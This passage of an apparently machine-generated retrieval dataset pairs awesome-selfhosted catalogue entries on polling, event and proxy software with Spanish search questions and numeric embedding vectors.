0.01962, 0.03309, -0.02361, -0.02344, -0.03634, -0.00144, -0.02254, 0.07873, 0.00123, -0.02598, 0.05543, 0.06383, -0.03372, 0.02952, 0.00122, -0.01698, -0.12094, 0.01096, 0.00222, 0.01358, 0.10265, -0.0082, 0.05521, 0.00735, 0.01682, 0.03885, 0.03788, 0.02339, 0.00348, 0.04955, -0.005, 0.05491, -0.01552, 0.00186, -0.02003, -0.03807, -0.06645, -0.01345, 0.00247, -0.04636, 0.04168, 0.01159, 0.00674, 0.00562, 0.0342, -0.0096, 0.06181, 0.01922, 0.08759, 0.00881, 0.01061, 0.06331, -0.0075, -0.07725, 0.01125, 0.01628, -0.02699, 0.04091, -0.03117, 0.01436, 0.01514, 0.05724, -0.02039, 0.00917, -0.08739, -0.00669, 0.00455, 0.04339, 0.00305, -0.01853, -0.02119, -0.00468, 0.02633, -0.00632, -0.03844, 0.04992, -0.00705, -0.0129, -0.02149, 0.05984, 0.04588, -0.00155, -0.03619, -0.08486, -0.02288, -0.07737, 0.02352, -0.00656, -0.04061, 0.01162, 0.01862, 0.052, -0.05184, -0.01437, 0.0327]} +{"tipo": "pregunta", "herramienta": "Polls and Events", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Polls and Events", "tema": "polls and events", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Polls and Events: Fider β€” Open platform to collect and prioritize feedback (alternative to UserVoice) [MIT, Docker]. Formbricks β€” Experience Management Suite built on the largest open source survey stack worldwide. Gracefully gather feedback at every step of the customer journey to know what your customers need [AGPL-3.0, Nodejs/Docker]. Framadate β€” Online service for planning an appointment or make a decision quickly and easily: Make a poll, Define dates or subjects to choose, Send the poll link to your friends or colleagues, Discuss and make a decision [CECILL-B, PHP]. Gancio β€” Local community event and agenda sharing [AGPL-3.0, Nodejs]. gathio β€” Self-destructing, shareable, no-registration event pages [GPL-3.0, Nodejs/Docker]. HeyForm β€” Form builder that allows anyone to create engaging conversational forms for surveys, questionnaires, quizzes, and polls [AGPL-3.0, Docker]. hitobito β€” Manage complex group hierarchies with members, events and a lot more [AGPL-3.0, Ruby].", "indexar": "existe alguna alternativa abierta a UserVoice para priorizar la retroalimentaciΓ³n del usuario?", "v": [-0.10141, 0.12249, -0.14734, -0.09273, -0.05329, 0.01113, -0.02871, -0.13402, -0.14586, -0.16989, 0.0935, -0.26087, -0.02218, 0.1269, 0.06085, -0.09415, 0.09931, 0.0685, 0.09502, 0.00665, 0.01648, 0.04595, -0.11743, -0.05271, -0.05455, 0.04814, -0.02214, -0.06051, -0.01235, 0.07541, 0.03235, -0.00272, 0.07215, -0.0112, -0.15788, 0.02623, 0.03342, 0.00703, 0.0036, 0.07372, 0.05202, 0.06735, -0.05442, 0.08655, -0.0147, 0.10795, -0.05315, -0.01062, 0.00182, 0.09432, -0.01265, -0.14992, -0.07182, -0.05043, 0.09794, 0.06566, 0.02673, -0.09146, -0.00647, -0.00067, -0.05116, 0.04119, 0.17433, -0.07794, 0.05457, 0.07083, 0.03405, -0.02215, -0.10526, 0.13096, -0.03886, 0.11131, 0.0181, -0.07584, 0.00362, 0.04028, 0.09178, 0.09204, 0.03386, 0.08815, -0.05224, -0.08703, 0.03369, -0.04896, -0.10953, -0.03891, 0.06465, -0.06014, -0.00586, 0.08974, 0.04234, -0.00188, 0.03267, -0.01627, 0.10186, -0.05424, -0.0938, 0.09761, -0.11695, 0.04408, 0.0138, 0.01658, -0.07208, 0.04399, -0.0202, -0.03796, -0.04119, -0.19161, -0.03764, 0.03192, 0.02545, -0.04874, -0.0006, -0.06876, 0.0647, 0.04338, -0.15677, -0.01885, -0.06514, -0.12251, -0.0545, 0.05667, -0.04593, -0.09229, 0.06695, 0.04844, -0.04472, 0.03063, -0.05389, 0.02283, 0.00359, 0.0183, 0.06427, -0.01518, -0.05364, -0.07412, 0.01773, 0.07943, -0.02511, 0.00265, 0.02312, 0.01618, 0.03738, -0.05241, 0.00079, -0.05487, 0.01169, -0.08673, -0.11458, 0.01581, -0.08818, 0.02216, -0.01331, 0.00168, -0.03412, 0.02726, -0.07353, 0.02747, 0.0741, 0.0871, 0.00861, -0.0192, -0.02664, -0.0377, -0.08768, -0.09249, 0.02849, -0.01051, 0.01053, -0.00013, 0.00803, 0.0626, 0.00561, -0.01245, 0.00462, -0.07341, 0.01316, -0.06896, 0.00575, -0.03157, 0.00808, -0.01416, -0.02764, 0.0343, 0.01225, -0.04056, 0.00143, 0.05492, 0.01204, -0.0053, 0.03945, -0.00558, -0.02732, -0.05888, 0.02244, -0.02786, 0.04294, 0.0062, -0.04956, -0.02874, -0.05079, 0.01318, 0.01701, -0.01765, -0.00012, 0.00586, -0.02927, 0.02853, -0.00433, 0.05502, 0.06701, -0.03639, 0.08312, 0.04094, -0.01012, -0.0095, 0.0667, -0.03075, -0.05269, -0.05067, -0.06612, 0.05586, -0.04266, 0.02936, 0.05958, 0.0257, 0.06697, 0.04492, 0.0256, -0.0304, 0.02849, 0.00379, -0.00619, 0.04315, -0.00897, 0.05238, 0.02503, -0.00794, 0.03299, -0.0057, 0.05537, 0.04238, -0.0421, 0.02947, 0.05159, -0.00355, -0.01495, 0.01768, -0.01639, -0.06197, 0.05398, 0.02068, 0.00459, -0.03478, 0.02826, 0.01044]} +{"tipo": "pregunta", "herramienta": "Polls and Events", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Polls and Events", "tema": "polls and events", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Polls and Events: LimeSurvey β€” Feature-rich web-based polling software. Supports extensive survey logic [GPL-2.0, PHP]. Meetable β€” Minimal events aggregator [MIT, PHP]. Mobilizon β€” Federated tool that helps you find, create and organise events and groups [AGPL-3.0, Elixir/Docker]. OpnForm β€” Beautiful open-source form builder [AGPL-3.0, PHP/Nodejs/Docker]. Revel β€” Community-focused event management and ticketing platform [⚠, MIT, Python/Docker].", "indexar": "que herramienta sirve para crear encuestas en lΓ­nea?", "v": [0.03425, 0.07496, -0.10549, -0.17975, 0.08384, -0.15077, -0.10714, -0.03227, -0.01223, -0.1452, -0.07843, -0.00731, 0.00152, -0.10742, 0.06819, 0.05733, 0.04604, -0.043, 0.07385, 0.00881, -0.0349, -0.01608, -0.08997, -0.08631, -0.16648, -0.05895, 0.02492, -0.10272, -0.08351, 0.11938, -0.02121, 0.05831, 0.02628, 0.05418, -0.1011, -0.02731, 0.00821, 0.15754, 0.0037, 0.04787, 0.00658, 0.04831, -0.10091, -0.00856, -0.04759, 0.01191, -0.00759, 0.05272, 0.0289, 0.02213, -0.07402, -0.11488, -0.11638, 0.0347, -0.00502, -0.07021, 0.15217, -0.14741, 0.06053, -0.07742, -0.14587, -0.08643, 0.06177, -0.02833, -0.00904, 0.02393, 0.01579, -0.12554, -0.03289, -0.00185, -0.03018, 0.06779, 0.02082, -0.00378, 0.04112, 0.02262, -0.01957, 0.01558, -0.00785, -0.05372, 0.05764, -0.04647, -0.08628, -0.01846, -0.09373, -0.07537, 0.02984, -0.00534, -0.01667, -0.03408, -0.01032, 0.0893, -0.01652, 0.06314, -0.06491, -0.04336, 0.0865, -0.10599, 0.09525, -0.02359, 0.07457, -0.12138, -0.05578, 0.07984, -0.0088, 0.00275, 0.00412, -0.03275, -0.08098, 0.07383, 0.12425, 0.02964, 0.00957, 0.00479, 0.05199, 0.06007, 0.02654, 0.0194, -0.01766, -0.08941, 0.07323, 0.10739, -0.06796, -0.07728, -0.07084, -0.05591, 0.00033, 0.00066, 0.02888, -0.05463, 0.00851, -0.02769, -0.08533, 0.01855, -0.00571, -0.0431, 0.01396, -0.08499, 0.02187, -0.14266, 0.07914, 0.12778, -0.06042, -0.12018, 0.02597, 0.00483, 0.02178, -0.12008, -0.00443, 0.00786, 0.04267, -0.02762, -0.00995, 0.04003, -0.03243, -0.08759, -0.04607, 0.01082, -0.09398, 0.0671, -0.0168, -0.05621, 0.06002, 0.0276, 0.03757, -0.04527, -0.00367, -0.02385, 0.10413, 0.04729, 0.00203, 0.02659, 0.06343, -0.06539, 0.07413, 0.00163, -0.02324, 0.05021, -0.00534, -0.09644, -0.05207, -0.02203, -0.01182, -0.04742, 0.0356, -0.02232, 0.05942, -0.04921, 0.01536, 0.04324, -0.04566, -0.02826, 0.00717, -0.00796, 0.07812, 0.00655, 0.071, -0.03383, 0.06759, -0.05311, -0.10445, -0.00568, -0.02977, -0.03015, -0.0373, 0.06364, -0.01367, 0.01282, 0.04063, 0.04091, 0.03926, -0.08879, -0.02062, -0.07146, 0.04191, -0.01659, 0.04296, -0.03988, -0.0315, 0.00895, -0.00746, -0.01725, 0.00136, 0.03446, 0.00384, 0.09814, 0.01562, -0.0088, 0.04924, 0.00023, 0.0801, -0.0706, -0.03488, -0.038, 0.02319, -0.07305, 0.09727, -0.02935, -0.03786, -0.07817, 0.01928, 0.05377, -0.05052, -0.02547, 0.00733, -0.06124, 0.00842, -0.00447, -0.05919, -0.13822, -0.06735, -0.00908, 0.07252, 0.00033, 0.076, -0.03507]} +{"tipo": "pregunta", "herramienta": "Polls and Events", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Polls and Events", "tema": "polls and events", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Polls and Events: LimeSurvey β€” Feature-rich web-based polling software. Supports extensive survey logic [GPL-2.0, PHP]. Meetable β€” Minimal events aggregator [MIT, PHP]. Mobilizon β€” Federated tool that helps you find, create and organise events and groups [AGPL-3.0, Elixir/Docker]. OpnForm β€” Beautiful open-source form builder [AGPL-3.0, PHP/Nodejs/Docker]. Revel β€” Community-focused event management and ticketing platform [⚠, MIT, Python/Docker].", "indexar": "con que puedo organizar eventos y grupos de manera federada?", "v": [-0.06146, 0.06803, -0.12734, -0.09271, -0.01288, 0.01271, 0.06057, 0.03895, -0.09595, -0.21838, -0.15535, 0.03372, -0.05057, -0.06368, 0.07192, 0.0768, 0.12561, -0.06671, 0.04709, -0.06613, -0.06934, 0.01074, 0.05449, 0.0101, 0.00406, -0.14638, 0.14195, 0.05803, -0.0284, -0.04731, 0.07437, 0.02972, 0.007, -0.05986, 0.06812, 0.00274, 0.02274, 0.11358, -0.13331, -0.10535, -0.23023, 0.02558, -0.10415, -0.07856, 0.04703, -0.00844, -0.15796, 0.05916, -0.01804, -0.00376, 0.03938, 0.03696, -0.03971, -0.06607, -0.12464, -0.09128, -0.15605, -0.16308, -0.0734, 0.06993, -0.05348, -0.02439, -0.06157, 0.08928, 0.08997, 0.13618, 0.01061, -0.00172, 0.03151, 0.01284, -0.03734, -0.14088, -0.06059, -0.02067, -0.05049, 0.09729, 0.03556, 0.08099, -0.0651, 0.11145, -0.02834, 0.05889, 0.00473, 0.06843, -0.05099, -0.05871, 0.00264, 0.0225, 0.00161, -0.01407, -0.03302, 0.01744, 0.03122, -0.08007, -0.04572, -0.12299, 0.05938, 0.03767, 0.02384, 0.0323, 0.03367, -0.00428, -0.00811, 0.04629, -0.06211, -0.01405, 0.02582, 0.12011, 0.11703, -0.00072, 0.00129, 0.03677, -0.01314, 0.06579, 0.05181, -0.04236, 0.01905, -0.02435, 0.15163, 0.02125, 0.0102, -0.01324, 0.01942, -0.00666, 0.00562, 0.01402, 0.06025, 0.16247, -0.01174, 0.03318, 0.05887, 0.03274, -0.04345, 0.07336, -0.05967, -0.03058, -0.10897, -0.01867, 0.11102, 0.00095, -0.02155, 0.05128, -0.02298, -0.11553, 0.05708, 0.02565, 0.01856, -0.02313, -0.0249, 0.07422, 0.04284, 0.00749, -0.07136, 0.0595, -0.04371, -0.00165, -0.07318, -0.05105, 0.1061, -0.0244, -0.11625, 0.03674, 0.01857, -0.08256, 0.01454, 0.038, -0.01322, -0.00105, -0.02246, 0.0555, -0.01127, 0.03836, 0.05124, -0.02658, 0.01714, 0.01583, -0.07111, -0.07356, 0.05449, -0.0044, 0.04017, 0.02979, -0.03134, -0.02894, 0.01543, -0.01754, 0.04359, 0.03238, 0.04852, -0.00335, 0.03397, 0.04766, 0.00083, -0.05294, 0.01872, -0.02819, -0.05406, -0.02316, 0.00792, -0.03349, 0.02262, -0.04094, 0.03668, 0.07093, -0.0093, -0.03626, -0.07124, 0.05551, 0.05356, 0.06063, 0.08381, 0.00067, 0.05201, -0.03517, -0.10738, 0.01498, 0.01182, -0.00337, 0.01936, 0.01695, 0.01458, 0.02765, 0.04799, -0.03162, 0.04829, -0.069, -0.01831, 0.00938, 0.06297, 0.03385, 0.01757, -0.0019, 0.02645, 0.03763, 0.02241, 0.00538, 0.04838, -0.04273, -0.01843, 0.05085, 0.00962, 0.02518, -0.02752, 0.01268, -0.03093, -0.05514, -0.04735, 0.06099, -0.05707, -0.03439, 0.04136, 0.00606, 0.06781, -0.03097, 0.03786, -0.00318]} +{"tipo": "pregunta", "herramienta": "Polls and Events", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Polls and Events", "tema": "polls and events", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Polls and Events: LimeSurvey β€” Feature-rich web-based polling software. Supports extensive survey logic [GPL-2.0, PHP]. Meetable β€” Minimal events aggregator [MIT, PHP]. Mobilizon β€” Federated tool that helps you find, create and organise events and groups [AGPL-3.0, Elixir/Docker]. OpnForm β€” Beautiful open-source form builder [AGPL-3.0, PHP/Nodejs/Docker]. Revel β€” Community-focused event management and ticketing platform [⚠, MIT, Python/Docker].", "indexar": "cual es una alternativa libre a los sistemas de gestiΓ³n de eventos", "v": [-0.0901, 0.09401, -0.05123, -0.15792, -0.0407, -0.03351, -0.08948, -0.08583, -0.14346, -0.0814, -0.16971, -0.12744, -0.05494, 0.00714, 0.13872, 0.01726, 0.12629, -0.11145, 0.10072, -0.01922, -0.14484, 0.01486, -0.02759, -0.05199, -0.06303, -0.05725, 0.07444, -0.04013, -0.06661, 0.00808, 0.01738, -0.00268, 0.10781, -0.09778, -0.00918, 0.01195, 0.053, 0.11615, -0.01612, -0.06811, -0.05138, -0.12435, -0.03358, 0.06755, 0.08281, -0.1418, -0.05653, 0.06044, 0.00958, -0.06446, -0.10423, 0.00908, -0.10795, -0.03003, 0.15774, -0.07699, -0.02506, -0.15617, -0.0305, -0.01318, -0.09386, 0.04258, -0.01496, -0.0195, 0.0723, 0.06053, -0.04075, -0.03794, -0.02372, 0.09923, 0.04345, -0.05113, 0.03233, 0.05939, 0.00407, 0.06112, 0.03901, 0.10382, -0.11421, 0.03413, -0.01576, -0.03443, -0.01495, 0.1368, -0.07029, -0.07298, 0.06685, -0.07831, 0.00626, 0.07403, 0.03674, -0.04465, 0.04698, 0.02981, -0.01134, -0.07917, 0.03084, 0.05762, -0.05538, 0.08088, 0.03533, 0.00388, -0.11362, -0.04025, -0.03616, -0.00488, 0.06602, 0.02637, 0.05704, -0.00425, -0.07218, 0.03538, -0.00631, -0.01019, -0.04778, -0.0172, 0.0452, -0.00063, -0.00888, 0.01495, -0.10591, -0.06581, 0.04666, -0.11477, 0.08083, 0.04435, 0.08762, 0.10502, -0.01465, 0.05386, 0.0957, -0.02727, -0.08054, 0.00208, -0.05636, -0.0687, 0.03363, 0.01428, 0.04755, -0.00611, -0.09209, 0.08906, 0.0271, -0.01693, 0.07445, -0.0262, 0.04888, -0.04605, -0.00093, 0.02577, -0.06154, 0.01691, -0.04726, 0.09892, -0.11021, -0.00527, -0.0674, -0.05083, -0.05171, 0.0437, -0.03983, -0.0093, -0.00956, 0.07111, -0.03655, -0.01147, 0.0129, -0.00155, 0.00208, 0.03487, 0.01915, 0.10919, 0.03498, -0.06781, 0.03392, -0.10572, -0.03437, -0.16709, 0.03357, -0.04931, -0.0383, 0.04039, -0.07137, 0.0069, 0.01605, -0.03301, 0.0006, 0.00634, 0.01344, 0.06601, 0.02362, 0.03795, -0.03745, -0.10917, -0.01051, 0.02864, -0.02083, -0.10485, -0.01821, 0.01147, -0.07242, 0.03608, 0.03644, -0.03895, -0.03439, 0.03357, -0.01592, 0.07659, 0.03629, 0.05498, 0.03643, 0.05009, 0.0661, -0.01236, -0.06043, -0.0151, 0.057, 0.00686, 0.04149, -0.08666, 0.06204, -0.00948, 0.01968, 0.04768, 0.01862, -0.03751, 0.02473, 0.03362, -0.00701, -0.02032, -0.01363, -0.03278, 0.03443, 0.06905, 0.01571, -0.01433, 0.04519, -0.0142, 0.00177, -0.04758, 0.05362, 0.11628, -0.02427, -0.05989, -0.03491, -0.02878, -0.13098, -0.01432, -0.03363, -0.07562, -0.00519, 0.00566, 0.00476, -0.00064, 0.04048, 0.01198]} +{"tipo": "pregunta", "herramienta": "Proxy", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Proxy", "tema": "proxy", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Proxy: g3proxy β€” Forward proxy server supporting proxy chaining, protocol inspection, MITM Interception, ICAP adaptation and transparent proxy [Apache-2.0, Rust/deb]. GitProxy β€” Proxy for Git that applies rules and workflows to all outgoing git push operations and ensures they are compliant. It supports both HTTP/HTTPS and SSH protocols with security scanning and validation [Apache-2.0, Nodejs/Docker]. imgproxy β€” Fast and secure standalone server for resizing and converting remote images [MIT, Go/Docker/K8S]. iodine β€” IPv4 over DNS tunnel solution, enabling you to start up a socks5 proxy listener [ISC, C/deb]. Outline Server β€” A proxy server that runs a Shadowsocks instance for each access key and a REST API to manage the access keys [Apache-2.0, Docker/Nodejs]. Privoxy β€” Non-caching web proxy with advanced filtering capabilities for enhancing privacy, modifying web page data and HTTP headers, controlling access, and removing ads and other obnoxious Internet junk [GPL-2.0, C/deb].", "indexar": "quΓ© servidor proxy sirve para inspeccionar protocolos y hacer interceptaciΓ³n MITM?", "v": [-0.01524, -0.0058, -0.15774, -0.18745, 0.14392, -0.1588, 0.05791, -0.08585, -0.05829, 0.0115, 0.02196, 0.08728, 0.20085, -0.11172, 0.04062, 0.11301, 0.158, -0.03648, 0.03734, -0.07485, 0.02473, 0.01108, 0.04013, -0.10233, -0.03771, 0.0457, 0.01453, 0.0166, -0.06231, -0.09673, -0.07762, -0.04452, 0.09595, 0.06432, -0.00173, -0.08994, 0.00021, 0.09296, -0.04925, 0.09562, 0.0332, -0.02453, -0.15857, -0.02404, 0.11696, -0.11732, -0.03717, -0.07859, -1e-05, -0.02151, -0.1215, -0.04489, -0.14579, 0.06603, -0.12209, 0.11577, 0.0236, -0.13631, 0.01984, 0.04668, -0.14353, -0.09152, 0.03548, -0.09056, 0.07082, -0.04537, -0.07128, -0.02176, -0.14516, -0.06923, -0.00335, 0.01502, 0.07266, -0.01559, 0.07042, 0.06089, -0.09604, -0.00865, 0.11471, 0.05501, -0.05846, 0.07608, -0.02213, 0.11482, -0.04459, -0.03285, -0.0298, -0.06243, 0.04209, -0.06596, 0.0464, 0.14879, -0.04777, -0.01328, 0.08661, -0.04522, 0.09167, -0.00295, 0.05643, 0.00881, 0.12417, -0.04468, -0.09445, 0.07507, -0.0224, 0.08269, 0.00572, -0.071, 0.01375, -0.03292, -0.01536, -0.03877, -0.08627, -0.02837, -0.03944, -0.0905, -0.03586, 0.01629, 0.04641, 0.05021, -0.04267, 0.0153, -0.02525, -0.00332, -0.02089, -0.09943, -0.04228, 0.05961, 0.08057, -0.03034, -0.07137, -0.03968, -0.06446, -0.02829, -0.01005, -0.00615, 0.05881, -0.11256, -0.09426, -0.08849, 0.02321, 0.01557, -0.02313, 0.03571, 0.08335, 0.01401, 0.14342, -0.00688, -0.10442, -0.00908, -0.01593, -0.02506, -0.06604, -0.03651, -0.07411, -0.00987, -0.00468, -0.11447, 0.00229, 0.04299, 0.04293, 0.01469, -0.00238, 0.03904, 0.07476, -0.01793, -0.01022, -0.01088, 0.05436, -0.0125, -0.03146, 0.00858, -0.05045, -0.10836, -0.01169, -0.03105, -0.06247, -0.04117, 0.05349, -0.04788, -0.01317, 0.02903, -0.00853, -0.00663, -0.01931, -0.03643, 0.03426, 0.02656, 0.02337, 0.04537, 0.01846, 0.02412, -0.03851, 0.03348, -0.02412, -0.04405, 0.00498, -0.01471, 0.01479, -0.02677, 0.02608, -0.05075, -0.00374, -0.04396, -0.01191, -0.0846, -0.05158, -0.01289, 0.01731, 0.07214, 0.00108, 0.01502, 0.07791, -0.00112, -0.05175, -0.00974, 0.04797, 0.00367, 0.01953, -0.01888, 0.01004, -0.00497, -0.00196, 0.03718, 0.00817, 0.02683, 0.00738, -0.02279, 0.06107, 0.02553, -0.019, 0.02696, -0.04708, 0.02396, 0.0093, 0.00896, -0.00427, -0.05117, -0.02053, -0.07076, 0.00068, 0.02919, -0.03144, -0.07186, 0.02989, -0.05076, -0.00828, 0.00926, 0.00222, -0.04882, -0.02229, -0.00261, 0.01071, -0.01266, 0.04089, -0.03724]} +{"tipo": "pregunta", "herramienta": "Proxy", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Proxy", "tema": "proxy", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Proxy: g3proxy β€” Forward proxy server supporting proxy chaining, protocol inspection, MITM Interception, ICAP adaptation and transparent proxy [Apache-2.0, Rust/deb]. GitProxy β€” Proxy for Git that applies rules and workflows to all outgoing git push operations and ensures they are compliant. It supports both HTTP/HTTPS and SSH protocols with security scanning and validation [Apache-2.0, Nodejs/Docker]. imgproxy β€” Fast and secure standalone server for resizing and converting remote images [MIT, Go/Docker/K8S]. iodine β€” IPv4 over DNS tunnel solution, enabling you to start up a socks5 proxy listener [ISC, C/deb]. Outline Server β€” A proxy server that runs a Shadowsocks instance for each access key and a REST API to manage the access keys [Apache-2.0, Docker/Nodejs]. Privoxy β€” Non-caching web proxy with advanced filtering capabilities for enhancing privacy, modifying web page data and HTTP headers, controlling access, and removing ads and other obnoxious Internet junk [GPL-2.0, C/deb].", "indexar": "con quΓ© puedo montar un proxy Git que aplique reglas de seguridad antes de enviar pushes?", "v": [0.15678, 0.2156, -0.18602, -0.09004, 0.01937, -0.00134, 0.00233, -0.00865, -0.10538, -0.0588, 0.00651, 0.03749, 0.0489, -0.04319, 0.07861, -0.05257, -0.01217, 0.01431, 0.00081, 0.0642, -0.01357, -0.11161, -0.07771, -0.20706, -0.06172, 0.08043, 0.10227, -0.0621, -0.13594, -0.06038, -0.04771, 0.01435, 0.01503, -0.00874, -0.06828, 0.00259, 0.01304, 0.06608, 0.07604, 0.0664, -0.00307, -0.13713, -0.14879, 0.03014, 0.07588, -0.0993, 0.05991, -0.03528, -0.02564, -0.14387, -0.01466, -0.06645, -0.06798, -0.0406, -0.08895, 0.01185, 0.09521, -0.15053, -0.1088, 0.03105, -0.05602, -0.00058, 0.01537, 0.12897, 0.01757, -0.05762, -0.02505, 0.01148, -0.17777, 0.00999, -0.02212, -0.11211, -0.01837, 0.06914, -0.0577, -0.03789, -0.08931, -0.05719, 0.02857, 0.13727, -0.01977, 0.03413, -0.0982, 0.05871, -0.08604, -0.02677, -0.01929, -0.07782, 0.0217, -0.02805, 0.05045, 0.04261, 0.03627, -0.02949, 0.03195, -0.12155, -0.05343, 0.01315, 0.02045, -0.01667, 0.01437, -0.09309, -0.01742, 0.09556, 0.04556, -0.07786, 0.03328, -0.06795, 0.08868, -0.09656, -0.02331, 0.01425, -0.05886, 0.01141, 0.06295, -0.06043, -0.0637, 0.0072, -0.03133, 0.02764, -0.05028, -0.01897, -0.02996, 0.1136, 0.10446, -0.00347, 0.03153, 0.09723, -0.08149, 0.05805, 0.01021, -0.04591, -0.05516, -0.00223, 0.00117, 0.08628, -0.00702, -0.03042, -0.05663, -0.08412, 0.07218, 0.01386, 0.01228, -0.01446, 0.02836, 0.13211, -0.00363, -0.04775, -0.01136, 0.01213, 0.02917, 0.02229, -0.00015, 0.0561, -0.02845, 0.05773, 0.00532, -0.08043, 0.12399, 0.00803, 0.06011, 0.14145, -0.03632, 0.02004, 0.00685, 0.00977, -0.01121, -0.08573, 0.04753, -0.02237, -0.00065, 0.01878, 0.04483, -0.06969, 0.04249, -0.02131, -0.11131, -0.08863, -0.01696, -0.04574, 0.00993, 0.05807, -0.0012, 0.03844, 0.02652, -0.01534, 0.06732, 0.04782, 0.04609, 0.13092, -0.0061, 0.0324, 0.00261, 0.0115, -0.02983, -0.08376, -0.00919, -0.04317, -0.00435, 0.00919, 0.03486, 0.01177, 0.01758, -0.02797, 0.05967, -0.03714, -0.00073, 0.0285, -0.0086, 0.09437, 0.07427, -0.03349, -0.03679, -0.01703, -0.02539, 0.00023, -8e-05, -0.03394, -0.10069, 0.00144, -0.03108, 0.01686, 0.03023, -0.0423, -0.0663, 0.03215, 0.02216, 0.02929, 0.0621, 0.0527, 0.01724, -0.01298, -0.06174, -0.02413, 0.04446, 0.02094, 0.02353, -0.01816, -0.02149, -0.03598, 0.01254, 0.02606, -0.012, -0.05029, -0.04487, -0.00919, -0.08409, 0.10176, 0.00629, -0.07551, -0.04303, 0.01577, -0.00633, -0.05621, -0.02211, -0.0379]} +{"tipo": "pregunta", "herramienta": "Proxy", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Proxy", "tema": "proxy", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Proxy: g3proxy β€” Forward proxy server supporting proxy chaining, protocol inspection, MITM Interception, ICAP adaptation and transparent proxy [Apache-2.0, Rust/deb]. GitProxy β€” Proxy for Git that applies rules and workflows to all outgoing git push operations and ensures they are compliant. It supports both HTTP/HTTPS and SSH protocols with security scanning and validation [Apache-2.0, Nodejs/Docker]. imgproxy β€” Fast and secure standalone server for resizing and converting remote images [MIT, Go/Docker/K8S]. iodine β€” IPv4 over DNS tunnel solution, enabling you to start up a socks5 proxy listener [ISC, C/deb]. Outline Server β€” A proxy server that runs a Shadowsocks instance for each access key and a REST API to manage the access keys [Apache-2.0, Docker/Nodejs]. Privoxy β€” Non-caching web proxy with advanced filtering capabilities for enhancing privacy, modifying web page data and HTTP headers, controlling access, and removing ads and other obnoxious Internet junk [GPL-2.0, C/deb].", "indexar": "que herramienta funciona como servidor proxy rΓ‘pido para redimensionar imΓ‘genes remotas?", "v": [0.04681, 0.03793, -0.23966, -0.23357, 0.02807, -0.07929, -0.04027, -0.03502, 0.04151, -0.0156, -0.05026, -0.14483, 0.05098, -0.1572, 0.08943, -0.00748, 0.09251, -0.04528, -0.00822, -0.03235, 0.05104, -0.02193, -0.07664, -0.08798, -0.02318, 0.00098, 0.10042, -0.00895, -0.13242, -0.09658, 0.05567, -0.02889, 0.14321, -0.01206, -0.1363, -0.04242, 0.01353, 0.13559, 0.01404, 0.09101, 0.04087, 0.01356, -0.11772, 0.0233, 0.04601, 0.00241, 0.00744, -0.08201, 0.03581, -0.00118, -0.10639, -0.12752, -0.15189, 0.03321, -0.05795, -0.12011, 0.19026, -0.19886, -0.00753, -0.04795, -0.07626, 0.01079, -0.08082, -0.10266, -0.00597, -0.05358, -0.05743, -0.1029, -0.16225, 0.02529, -0.06284, -0.00013, 0.05314, -0.01232, -0.0093, -0.01493, -0.06401, -0.06131, -0.01978, 0.01489, 0.04306, 0.06013, -0.07703, 0.03899, -0.12035, -0.09313, -0.03103, -0.04912, 0.06414, -0.05876, 0.00149, 0.08665, 0.05113, 0.083, 0.06082, -0.00978, 0.05418, -0.07025, 0.00565, -0.07407, 0.12748, 0.00504, -0.08071, 0.04394, -0.00185, 0.07778, 0.04888, -0.04436, -0.07112, -0.0636, 0.12014, -0.0321, -0.00516, -0.03161, -0.08455, -0.05917, -0.06243, -0.03872, 0.03851, 0.02056, -0.0146, 0.03988, 0.00073, 0.02116, 0.01595, -0.03248, 0.01961, 0.04383, -0.01086, -0.06864, -0.02154, -0.05231, -0.07941, -0.05531, -0.04855, 0.00243, 0.08239, -0.15749, -0.05153, -0.1226, -0.0216, -0.01218, -0.01695, -0.05792, 0.03691, 0.03012, 0.09254, -0.03395, -0.06952, 0.04211, 0.06088, -0.04967, -0.0105, -0.01664, -0.06694, 0.02061, -0.06878, -0.04362, -0.09573, -0.01677, -0.02759, -0.04053, 0.09167, 0.06583, -0.04078, -0.07646, 0.00606, -0.03886, 0.056, 0.06536, -0.00845, -0.02086, 0.00452, -0.0677, 0.01474, 0.00923, -0.05397, -0.05587, -0.00909, -0.03437, 0.00671, 0.02278, 0.01215, -0.02389, -0.01114, -0.02125, -0.00547, 0.00959, -0.0312, 0.01556, -0.00092, -0.00131, -0.01104, 0.02206, 0.0603, -0.04698, -0.07181, -0.04454, 0.03484, 0.00628, 0.0006, -0.09172, -0.00803, -0.0308, -0.01149, -0.03857, -0.00065, 0.0479, -0.03287, -0.00032, -0.02331, -0.02952, 0.04692, -0.00897, 0.01454, 0.0023, 0.0391, -0.07234, -0.07371, -0.03979, -0.02965, 0.02792, 0.02025, 0.05031, -0.0046, 0.08406, 0.01356, 0.0355, 0.02462, -0.05513, 0.03555, 0.04565, -0.03252, -0.02486, 0.01562, -0.07587, 0.00977, -0.04115, -0.00448, -0.01957, -0.01216, 0.02576, -0.00182, 0.0076, -0.03335, -0.02631, 0.00836, -0.05085, 0.01077, -0.05263, -0.01735, -0.01243, 0.00975, -0.01428, 0.01146, 0.01793]} +{"tipo": "pregunta", "herramienta": "Proxy", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Proxy", "tema": "proxy", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Proxy: sish β€” 